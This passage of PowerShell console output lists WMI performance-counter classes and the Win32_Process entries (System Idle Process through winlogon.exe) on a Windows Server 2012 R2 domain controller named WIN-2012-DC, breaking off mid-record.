Win32_PerfFormattedData_dfsr_DFS... {} {BandwidthSavingsUsingDFSReplication, Caption, CompressedSizeofFilesReceived, ConflictBytesCleanedup...} Win32_PerfRawData_dfsr_DFSReplic... {} {BandwidthSavingsUsingDFSReplication, Caption, CompressedSizeofFilesReceived, ConflictBytesCleanedup...} Win32_PerfFormattedData_dfsr_DFS... {} {BandwidthSavingsUsingDFSReplication, BytesReceivedPerSecond, Caption, CompressedSizeofFilesReceived...} Win32_PerfRawData_dfsr_DFSReplic... {} {BandwidthSavingsUsingDFSReplication, BytesReceivedPerSecond, Caption, CompressedSizeofFilesReceived...} Win32_PerfFormattedData_dfsr_DFS... {} {Caption, DatabaseCommits, DatabaseLookups, Description...} Win32_PerfRawData_dfsr_DFSReplic... {} {Caption, DatabaseCommits, DatabaseLookups, Description...} Win32_PerfFormattedData_Director... {} {ABANRPersec, ABBrowsesPersec, ABClientSessions, ABMatchesPersec...} Win32_PerfRawData_DirectoryServi... {} {ABANRPersec, ABBrowsesPersec, ABClientSessions, ABMatchesPersec...} Win32_PerfFormattedData_DNS_DNS {} {AXFRRequestReceived, AXFRRequestSent, AXFRResponseReceived, AXFRSuccessReceived...} Win32_PerfRawData_DNS_DNS {} {AXFRRequestReceived, AXFRRequestSent, AXFRResponseReceived, AXFRSuccessReceived...} Win32_PerfFormattedData_ESENT_Da... {} {Caption, DatabaseCacheMemoryCommitted, DatabaseCacheMemoryCommittedMB, DatabaseCacheMemoryReserved...} Win32_PerfRawData_ESENT_Database {} {Caption, DatabaseCacheMemoryCommitted, DatabaseCacheMemoryCommittedMB, DatabaseCacheMemoryReserved...} Win32_PerfFormattedData_ESENT_Da... {} {Caption, DatabaseCacheMissesPersec, DatabaseCachePercentHit, DatabaseCachePercentHitUncorrelated...} Win32_PerfRawData_ESENT_Database... {} {Caption, DatabaseCacheMissesPersec, DatabaseCachePercentHit, DatabaseCachePercentHit_Base...} Win32_PerfFormattedData_ESENT_Da... {} {Caption, DatabaseCacheMissesPersec, DatabaseCachePercentHit, DatabaseCachePercentHitUncorrelated...} Win32_PerfRawData_ESENT_Database... {} {Caption, DatabaseCacheMissesPersec, DatabaseCachePercentHit, DatabaseCachePercentHit_Base...} Win32_PerfFormattedData_LocalSes... {} {ActiveSessions, Caption, Description, Frequency_Object...} Win32_PerfRawData_LocalSessionMa... {} {ActiveSessions, Caption, Description, Frequency_Object...} Win32_PerfFormattedData_Lsa_Secu... {} {Caption, ContextHandles, CredentialHandles, Description...} Win32_PerfRawData_Lsa_SecurityPe... {} {Caption, ContextHandles, CredentialHandles, Description...} Win32_PerfFormattedData_Lsa_Secu... {} {ActiveSchannelSessionCacheEntries, Caption, Description, DigestAuthentications...} Win32_PerfRawData_Lsa_SecuritySy... {} {ActiveSchannelSessionCacheEntries, Caption, Description, DigestAuthentications...} Win32_PerfFormattedData_MSDTC_Di... {} {AbortedTransactions, AbortedTransactionsPersec, ActiveTransactions, ActiveTransactionsMaximum...} Win32_PerfRawData_MSDTC_Distribu... {} {AbortedTransactions, AbortedTransactionsPersec, ActiveTransactions, ActiveTransactionsMaximum...} Win32_PerfFormattedData_MSDTCBri... {} {Averageparticipantcommitresponsetime, Averageparticipantprepareresponsetime, Caption, CommitretrycountPersec...} Win32_PerfRawData_MSDTCBridge400... {} {Averageparticipantcommitresponsetime, Averageparticipantcommitresponsetime_Base, Averageparticipantprepareresponsetime, Averageparticipantpre... Win32_PerfFormattedData_NETCLRDa... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_NETCLRData_NET... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_NETCLRNe... {} {BytesReceived, BytesSent, Caption, ConnectionsEstablished...} Win32_PerfRawData_NETCLRNetworki... {} {BytesReceived, BytesSent, Caption, ConnectionsEstablished...} Win32_PerfFormattedData_NETCLRNe... {} {BytesReceived, BytesSent, Caption, ConnectionsEstablished...} Win32_PerfRawData_NETCLRNetworki... {} {BytesReceived, BytesSent, Caption, ConnectionsEstablished...} Win32_PerfFormattedData_NETDataP... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_NETDataProvide... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_NETDataP... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_NETDataProvide... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_NETFrame... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_NETFramework_N... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_NETFrame... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_NETFramework_N... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_NETFrame... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_NETFramework_N... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_NETFrame... {} {AssemblySearchLength, BytesinLoaderHeap, Caption, Currentappdomains...} Win32_PerfRawData_NETFramework_N... {} {AssemblySearchLength, BytesinLoaderHeap, Caption, Currentappdomains...} Win32_PerfFormattedData_NETFrame... {} {Caption, ContentionRatePersec, CurrentQueueLength, Description...} Win32_PerfRawData_NETFramework_N... {} {Caption, ContentionRatePersec, CurrentQueueLength, Description...} Win32_PerfFormattedData_NETFrame... {} {AllocatedBytesPersec, Caption, Description, FinalizationSurvivors...} Win32_PerfRawData_NETFramework_N... {} {AllocatedBytesPersec, Caption, Description, FinalizationSurvivors...} Win32_PerfFormattedData_NETFrame... {} {Caption, Channels, ContextBoundClassesLoaded, ContextBoundObjectsAllocPersec...} Win32_PerfRawData_NETFramework_N... {} {Caption, Channels, ContextBoundClassesLoaded, ContextBoundObjectsAllocPersec...} Win32_PerfFormattedData_NETFrame... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_NETFramework_N... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_NETMemor... {} {CacheEntries, CacheHitRatio, CacheHits, CacheMisses...} Win32_PerfRawData_NETMemoryCache... {} {CacheEntries, CacheHitRatio, CacheHitRatio_Base, CacheHits...} Win32_PerfFormattedData_NTDS_NTDS {} {ABANRPersec, ABBrowsesPersec, ABClientSessions, ABMatchesPersec...} Win32_PerfRawData_NTDS_NTDS {} {ABANRPersec, ABBrowsesPersec, ABClientSessions, ABMatchesPersec...} Win32_PerfFormattedData_PerfDisk... {} {AvgDiskBytesPerRead, AvgDiskBytesPerTransfer, AvgDiskBytesPerWrite, AvgDiskQueueLength...} Win32_PerfRawData_PerfDisk_Logic... {} {AvgDiskBytesPerRead, AvgDiskBytesPerRead_Base, AvgDiskBytesPerTransfer, AvgDiskBytesPerTransfer_Base...} Win32_PerfFormattedData_PerfDisk... {} {AvgDiskBytesPerRead, AvgDiskBytesPerTransfer, AvgDiskBytesPerWrite, AvgDiskQueueLength...} Win32_PerfRawData_PerfDisk_Physi... {} {AvgDiskBytesPerRead, AvgDiskBytesPerRead_Base, AvgDiskBytesPerTransfer, AvgDiskBytesPerTransfer_Base...} Win32_PerfFormattedData_PerfNet_... {} {AnnouncementsDomainPersec, AnnouncementsServerPersec, AnnouncementsTotalPersec, Caption...} Win32_PerfRawData_PerfNet_Browser {} {AnnouncementsDomainPersec, AnnouncementsServerPersec, AnnouncementsTotalPersec, Caption...} Win32_PerfFormattedData_PerfNet_... {} {BytesReceivedPersec, BytesTotalPersec, BytesTransmittedPersec, Caption...} Win32_PerfRawData_PerfNet_Redire... {} {BytesReceivedPersec, BytesTotalPersec, BytesTransmittedPersec, Caption...} Win32_PerfFormattedData_PerfNet_... {} {BlockingRequestsRejected, BytesReceivedPersec, BytesTotalPersec, BytesTransmittedPersec...} Win32_PerfRawData_PerfNet_Server {} {BlockingRequestsRejected, BytesReceivedPersec, BytesTotalPersec, BytesTransmittedPersec...} Win32_PerfFormattedData_PerfNet_... {} {ActiveThreads, AvailableThreads, AvailableWorkItems, BorrowedWorkItems...} Win32_PerfRawData_PerfNet_Server... {} {ActiveThreads, AvailableThreads, AvailableWorkItems, BorrowedWorkItems...} Win32_PerfFormattedData_PerfOS_C... {} {AsyncCopyReadsPersec, AsyncDataMapsPersec, AsyncFastReadsPersec, AsyncMDLReadsPersec...} Win32_PerfRawData_PerfOS_Cache {} {AsyncCopyReadsPersec, AsyncDataMapsPersec, AsyncFastReadsPersec, AsyncMDLReadsPersec...} Win32_PerfFormattedData_PerfOS_M... {} {AvailableBytes, AvailableKBytes, AvailableMBytes, CacheBytes...} Win32_PerfRawData_PerfOS_Memory {} {AvailableBytes, AvailableKBytes, AvailableMBytes, CacheBytes...} Win32_PerfFormattedData_PerfOS_N... {} {AvailableMBytes, Caption, Description, FreeAndZeroPageListMBytes...} Win32_PerfRawData_PerfOS_NUMANod... {} {AvailableMBytes, Caption, Description, FreeAndZeroPageListMBytes...} Win32_PerfFormattedData_PerfOS_O... {} {Caption, Description, Events, Frequency_Object...} Win32_PerfRawData_PerfOS_Objects {} {Caption, Description, Events, Frequency_Object...} Win32_PerfFormattedData_PerfOS_P... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_PerfOS_PagingFile {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_PerfOS_P... {} {C1TransitionsPersec, C2TransitionsPersec, C3TransitionsPersec, Caption...} Win32_PerfRawData_PerfOS_Processor {} {C1TransitionsPersec, C2TransitionsPersec, C3TransitionsPersec, Caption...} Win32_PerfFormattedData_PerfOS_S... {} {AlignmentFixupsPersec, Caption, ContextSwitchesPersec, Description...} Win32_PerfRawData_PerfOS_System {} {AlignmentFixupsPersec, Caption, ContextSwitchesPersec, Description...} Win32_PerfFormattedData_PerfProc... {} {Caption, Description, ExecReadOnly, ExecReadPerWrite...} Win32_PerfRawData_PerfProc_FullI... {} {Caption, Description, ExecReadOnly, ExecReadPerWrite...} Win32_PerfFormattedData_PerfProc... {} {Caption, Description, ExecReadOnly, ExecReadPerWrite...} Win32_PerfRawData_PerfProc_Image... {} {Caption, Description, ExecReadOnly, ExecReadPerWrite...} Win32_PerfFormattedData_PerfProc... {} {Caption, CurrentPercentKernelModeTime, CurrentPercentProcessorTime, CurrentPercentUserModeTime...} Win32_PerfRawData_PerfProc_JobOb... {} {Caption, CurrentPercentKernelModeTime, CurrentPercentProcessorTime, CurrentPercentUserModeTime...} Win32_PerfFormattedData_PerfProc... {} {Caption, CreatingProcessID, Description, ElapsedTime...} Win32_PerfRawData_PerfProc_JobOb... {} {Caption, CreatingProcessID, Description, ElapsedTime...} Win32_PerfFormattedData_PerfProc... {} {Caption, CreatingProcessID, Description, ElapsedTime...} Win32_PerfRawData_PerfProc_Process {} {Caption, CreatingProcessID, Description, ElapsedTime...} Win32_PerfFormattedData_PerfProc... {} {BytesFree, BytesImageFree, BytesImageReserved, BytesReserved...} Win32_PerfRawData_PerfProc_Proce... {} {BytesFree, BytesImageFree, BytesImageReserved, BytesReserved...} Win32_PerfFormattedData_PerfProc... {} {Caption, ContextSwitchesPersec, Description, ElapsedTime...} Win32_PerfRawData_PerfProc_Thread {} {Caption, ContextSwitchesPersec, Description, ElapsedTime...} Win32_PerfFormattedData_PerfProc... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_PerfProc_Threa... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_PowerMet... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_PowerMeterCoun... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_RemoteAc... {} {AlignmentErrors, BufferOverrunErrors, BytesReceived, BytesReceivedPerSec...} Win32_PerfRawData_RemoteAccess_R... {} {AlignmentErrors, BufferOverrunErrors, BytesReceived, BytesReceivedPerSec...} Win32_PerfFormattedData_RemoteAc... {} {AlignmentErrors, BufferOverrunErrors, BytesReceived, BytesReceivedPerSec...} Win32_PerfRawData_RemoteAccess_R... {} {AlignmentErrors, BufferOverrunErrors, BytesReceived, BytesReceivedPerSec...} Win32_PerfFormattedData_ServiceM... {} {Calls, CallsDuration, CallsFailed, CallsFailedPerSecond...} Win32_PerfRawData_ServiceModel40... {} {Calls, CallsDuration, CallsDuration_Base, CallsFailed...} Win32_PerfFormattedData_ServiceM... {} {CallFailedPerSecond, Calls, CallsDuration, CallsFailed...} Win32_PerfRawData_ServiceModel40... {} {CallFailedPerSecond, Calls, CallsDuration, CallsDuration_Base...} Win32_PerfFormattedData_ServiceM... {} {Calls, CallsDuration, CallsFailed, CallsFailedPerSecond...} Win32_PerfRawData_ServiceModel40... {} {Calls, CallsDuration, CallsDuration_Base, CallsFailed...} Win32_PerfFormattedData_SMSvcHos... {} {Caption, ConnectionsAcceptedovernetpipe, ConnectionsAcceptedovernettcp, ConnectionsDispatchedovernetpipe...} Win32_PerfRawData_SMSvcHost4000_... {} {Caption, ConnectionsAcceptedovernetpipe, ConnectionsAcceptedovernettcp, ConnectionsDispatchedovernetpipe...} Win32_PerfFormattedData_Spooler_... {} {AddNetworkPrinterCalls, BytesPrintedPersec, Caption, Description...} Win32_PerfRawData_Spooler_PrintQ... {} {AddNetworkPrinterCalls, BytesPrintedPersec, Caption, Description...} Win32_PerfFormattedData_TapiSrv_... {} {ActiveLines, ActiveTelephones, Caption, ClientApps...} Win32_PerfRawData_TapiSrv_Telephony {} {ActiveLines, ActiveTelephones, Caption, ClientApps...} Win32_PerfFormattedData_Tcpip_ICMP {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_Tcpip_ICMP {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_Tcpip_IC... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_Tcpip_ICMPv6 {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_Tcpip_IPv4 {} {Caption, DatagramsForwardedPersec, DatagramsOutboundDiscarded, DatagramsOutboundNoRoute...} Win32_PerfRawData_Tcpip_IPv4 {} {Caption, DatagramsForwardedPersec, DatagramsOutboundDiscarded, DatagramsOutboundNoRoute...} Win32_PerfFormattedData_Tcpip_IPv6 {} {Caption, DatagramsForwardedPersec, DatagramsOutboundDiscarded, DatagramsOutboundNoRoute...} Win32_PerfRawData_Tcpip_IPv6 {} {Caption, DatagramsForwardedPersec, DatagramsOutboundDiscarded, DatagramsOutboundNoRoute...} Win32_PerfFormattedData_Tcpip_NB... {} {BytesReceivedPersec, BytesSentPersec, BytesTotalPersec, Caption...} Win32_PerfRawData_Tcpip_NBTConne... {} {BytesReceivedPersec, BytesSentPersec, BytesTotalPersec, Caption...} Win32_PerfFormattedData_Tcpip_Ne... {} {BytesReceivedPersec, BytesSentPersec, BytesTotalPersec, Caption...} Win32_PerfRawData_Tcpip_NetworkA... {} {BytesReceivedPersec, BytesSentPersec, BytesTotalPersec, Caption...} Win32_PerfFormattedData_Tcpip_Ne... {} {BytesReceivedPersec, BytesSentPersec, BytesTotalPersec, Caption...} Win32_PerfRawData_Tcpip_NetworkI... {} {BytesReceivedPersec, BytesSentPersec, BytesTotalPersec, Caption...} Win32_PerfFormattedData_Tcpip_TCPv4 {} {Caption, ConnectionFailures, ConnectionsActive, ConnectionsEstablished...} Win32_PerfRawData_Tcpip_TCPv4 {} {Caption, ConnectionFailures, ConnectionsActive, ConnectionsEstablished...} Win32_PerfFormattedData_Tcpip_TCPv6 {} {Caption, ConnectionFailures, ConnectionsActive, ConnectionsEstablished...} Win32_PerfRawData_Tcpip_TCPv6 {} {Caption, ConnectionFailures, ConnectionsActive, ConnectionsEstablished...} Win32_PerfFormattedData_Tcpip_UDPv4 {} {Caption, DatagramsNoPortPersec, DatagramsPersec, DatagramsReceivedErrors...} Win32_PerfRawData_Tcpip_UDPv4 {} {Caption, DatagramsNoPortPersec, DatagramsPersec, DatagramsReceivedErrors...} Win32_PerfFormattedData_Tcpip_UDPv6 {} {Caption, DatagramsNoPortPersec, DatagramsPersec, DatagramsReceivedErrors...} Win32_PerfRawData_Tcpip_UDPv6 {} {Caption, DatagramsNoPortPersec, DatagramsPersec, DatagramsReceivedErrors...} Win32_PerfFormattedData_TCPIPCou... {} {Caption, Deniedconnectorsendrequestsinlowpowermode, Description, Frequency_Object...} Win32_PerfRawData_TCPIPCounters_... {} {Caption, Deniedconnectorsendrequestsinlowpowermode, Description, Frequency_Object...} Win32_PerfFormattedData_TermServ... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_TermService_Te... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_usbhub_USB {} {AvgBytesPerTransfer, AvgmslatencyforISOtransfers, BulkBytesPerSec, Caption...} Win32_PerfRawData_usbhub_USB {} {AvgBytesPerTransfer, AvgBytesPerTransfer_Base, AvgmslatencyforISOtransfers, AvgmslatencyforISOtransfers_Base...} Win32_PerfFormattedData_WindowsW... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_WindowsWorkflo... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_WinNatCo... {} {Caption, CurrentSessionCount, Description, DroppedICMPerrorpackets...} Win32_PerfRawData_WinNatCounters... {} {Caption, CurrentSessionCount, Description, DroppedICMPerrorpackets...} Win32_PerfFormattedData_WinNatCo... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_WinNatCounters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_WinNatCo... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_WinNatCounters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_WinNatCo... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_WinNatCounters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_WinNatCo... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfRawData_WinNatCounters... {} {Caption, Description, Frequency_Object, Frequency_PerfTime...} Win32_PerfFormattedData_Workflow... {} {AverageWorkflowLoadTime, AverageWorkflowPersistTime, Caption, Description...} Win32_PerfRawData_WorkflowServic... {} {AverageWorkflowLoadTime, AverageWorkflowLoadTime_Base, AverageWorkflowPersistTime, AverageWorkflowPersistTime_Base...} PS C:\Users\Administrator> ``` ```PowerShell PS C:\Users\Administrator> Get-WmiObject -Class Win32_process __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="0" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="0" Caption : System Idle Process CommandLine : CreationClassName : Win32_Process CreationDate : CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : System Idle Process ExecutablePath : ExecutionState : Handle : 0 HandleCount : 0 InstallDate : KernelModeTime : 152086718750 MaximumWorkingSetSize : MinimumWorkingSetSize : Name : System Idle Process OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 0 OtherTransferCount : 0 PageFaults : 1 PageFileUsage : 0 ParentProcessId : 0 PeakPageFileUsage : 0 PeakVirtualSize : 65536 PeakWorkingSetSize : 4 Priority : 0 PrivatePageCount : 0 ProcessId : 0 QuotaNonPagedPoolUsage : 0 QuotaPagedPoolUsage : 0 QuotaPeakNonPagedPoolUsage : 0 QuotaPeakPagedPoolUsage : 0 ReadOperationCount : 0 ReadTransferCount : 0 SessionId : 0 Status : TerminationDate : ThreadCount : 1 UserModeTime : 0 VirtualSize : 65536 WindowsVersion : 6.3.9600 WorkingSetSize : 4096 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : WIN-2012-DC ProcessName : System Idle Process Handles : 0 VM : 65536 WS : 4096 Path : __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="4" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="4" Caption : System CommandLine : CreationClassName : Win32_Process CreationDate : 20170712121425.018613-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : System ExecutablePath : ExecutionState : Handle : 4 HandleCount : 808 InstallDate : KernelModeTime : 478281250 MaximumWorkingSetSize : MinimumWorkingSetSize : Name : System OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 3337 OtherTransferCount : 131409 PageFaults : 4798 PageFileUsage : 112 ParentProcessId : 0 PeakPageFileUsage : 276 PeakVirtualSize : 7389184 PeakWorkingSetSize : 1716 Priority : 8 PrivatePageCount : 114688 ProcessId : 4 QuotaNonPagedPoolUsage : 0 QuotaPagedPoolUsage : 0 QuotaPeakNonPagedPoolUsage : 0 QuotaPeakPagedPoolUsage : 0 ReadOperationCount : 195 ReadTransferCount : 53093300 SessionId : 0 Status : TerminationDate : ThreadCount : 75 UserModeTime : 0 VirtualSize : 3432448 WindowsVersion : 6.3.9600 WorkingSetSize : 139264 WriteOperationCount : 13027 WriteTransferCount : 206413624 PSComputerName : WIN-2012-DC ProcessName : System Handles : 808 VM : 3432448 WS : 139264 Path : __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="208" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="208" Caption : smss.exe CommandLine : CreationClassName : Win32_Process CreationDate : 20170712121425.018613-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : smss.exe ExecutablePath : ExecutionState : Handle : 208 HandleCount : 52 InstallDate : KernelModeTime : 156250 MaximumWorkingSetSize : MinimumWorkingSetSize : Name : smss.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 266 OtherTransferCount : 31584 PageFaults : 595 PageFileUsage : 276 ParentProcessId : 4 PeakPageFileUsage : 336 PeakVirtualSize : 25382912 PeakWorkingSetSize : 1032 Priority : 11 PrivatePageCount : 282624 ProcessId : 208 QuotaNonPagedPoolUsage : 3 QuotaPagedPoolUsage : 13 QuotaPeakNonPagedPoolUsage : 7 QuotaPeakPagedPoolUsage : 53 ReadOperationCount : 4 ReadTransferCount : 29188 SessionId : 0 Status : TerminationDate : ThreadCount : 2 UserModeTime : 0 VirtualSize : 4317184 WindowsVersion : 6.3.9600 WorkingSetSize : 217088 WriteOperationCount : 1 WriteTransferCount : 32 PSComputerName : WIN-2012-DC ProcessName : smss.exe Handles : 52 VM : 4317184 WS : 217088 Path : __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="292" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="292" Caption : csrss.exe CommandLine : CreationClassName : Win32_Process CreationDate : 20170712121426.081561-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : csrss.exe ExecutablePath : ExecutionState : Handle : 292 HandleCount : 180 InstallDate : KernelModeTime : 5000000 MaximumWorkingSetSize : MinimumWorkingSetSize : Name : csrss.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 14627 OtherTransferCount : 839996 PageFaults : 2986 PageFileUsage : 1552 ParentProcessId : 284 PeakPageFileUsage : 1552 PeakVirtualSize : 45264896 PeakWorkingSetSize : 3352 Priority : 13 PrivatePageCount : 1589248 ProcessId : 292 QuotaNonPagedPoolUsage : 11 QuotaPagedPoolUsage : 116 QuotaPeakNonPagedPoolUsage : 13 QuotaPeakPagedPoolUsage : 122 ReadOperationCount : 64 ReadTransferCount : 55340 SessionId : 0 Status : TerminationDate : ThreadCount : 8 UserModeTime : 781250 VirtualSize : 44339200 WindowsVersion : 6.3.9600 WorkingSetSize : 1380352 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : WIN-2012-DC ProcessName : csrss.exe Handles : 180 VM : 44339200 WS : 1380352 Path : __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="344" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="344" Caption : csrss.exe CommandLine : CreationClassName : Win32_Process CreationDate : 20170712121426.456426-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : csrss.exe ExecutablePath : ExecutionState : Handle : 344 HandleCount : 185 InstallDate : KernelModeTime : 3906250 MaximumWorkingSetSize : MinimumWorkingSetSize : Name : csrss.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 3137 OtherTransferCount : 69162 PageFaults : 64988 PageFileUsage : 1496 ParentProcessId : 336 PeakPageFileUsage : 1552 PeakVirtualSize : 85655552 PeakWorkingSetSize : 35324 Priority : 13 PrivatePageCount : 1531904 ProcessId : 344 QuotaNonPagedPoolUsage : 16 QuotaPagedPoolUsage : 162 QuotaPeakNonPagedPoolUsage : 17 QuotaPeakPagedPoolUsage : 192 ReadOperationCount : 33315 ReadTransferCount : 1039202 SessionId : 1 Status : TerminationDate : ThreadCount : 10 UserModeTime : 312500 VirtualSize : 71077888 WindowsVersion : 6.3.9600 WorkingSetSize : 23592960 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : WIN-2012-DC ProcessName : csrss.exe Handles : 185 VM : 71077888 WS : 23592960 Path : __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="352" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="352" Caption : wininit.exe CommandLine : wininit.exe CreationClassName : Win32_Process CreationDate : 20170712121426.456426-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : wininit.exe ExecutablePath : C:\Windows\system32\wininit.exe ExecutionState : Handle : 352 HandleCount : 79 InstallDate : KernelModeTime : 312500 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : wininit.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 1036 OtherTransferCount : 2788 PageFaults : 1112 PageFileUsage : 728 ParentProcessId : 284 PeakPageFileUsage : 956 PeakVirtualSize : 45092864 PeakWorkingSetSize : 3524 Priority : 13 PrivatePageCount : 745472 ProcessId : 352 QuotaNonPagedPoolUsage : 8 QuotaPagedPoolUsage : 88 QuotaPeakNonPagedPoolUsage : 10 QuotaPeakPagedPoolUsage : 90 ReadOperationCount : 1 ReadTransferCount : 6656 SessionId : 0 Status : TerminationDate : ThreadCount : 1 UserModeTime : 156250 VirtualSize : 41603072 WindowsVersion : 6.3.9600 WorkingSetSize : 294912 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : WIN-2012-DC ProcessName : wininit.exe Handles : 79 VM : 41603072 WS : 294912 Path : C:\Windows\system32\wininit.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="380" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : WIN-2012-DC __NAMESPACE : root\cimv2 __PATH : \\WIN-2012-DC\root\cimv2:Win32_Process.Handle="380" Caption : winlogon.exe CommandLine : winlogon.exe CreationClassName : Win32_Process CreationDate : 20170712121426.472426-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : winlogon.exe ExecutablePath : C:\Windows\system32\winlogon.exe ExecutionState : Handle : 380 HandleCount : 156 InstallDate : KernelModeTime : 937500 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : winlogon.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 1203 